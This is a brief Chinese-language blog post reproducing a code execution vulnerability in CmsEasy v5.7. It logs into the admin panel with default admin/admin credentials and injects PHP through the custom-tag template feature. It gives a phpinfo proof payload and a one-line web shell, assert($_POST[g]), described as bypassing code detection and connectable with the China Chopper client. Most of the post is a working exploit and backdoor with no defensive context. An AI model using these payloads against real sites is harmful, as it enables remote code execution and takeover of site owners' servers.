[PHP知识库]CmsEasy_v5.7 代码执行漏洞复现

环境安装这就不多说了，官网自己下载

CmsEasy_v5.7

我下载的6.0也能用。
首先网页长这样

然后在网址后面输入/admin进入后台登陆
登陆后台admin,admin

点击，模板–自定义标签—添加自定义标签–填写Payload—提交：

Payload： 1111111111";}<?php phpinfo()?>
提交完要点击预览

附绕代码检测的一句话Payload: 11";}<?php assert($_POST[g]);?>
菜刀连接即可，他们说菜刀能连，我练不上，百度说这个一句话11年以前的才能连，我没有
试了一下g=phpinfo();,能执行。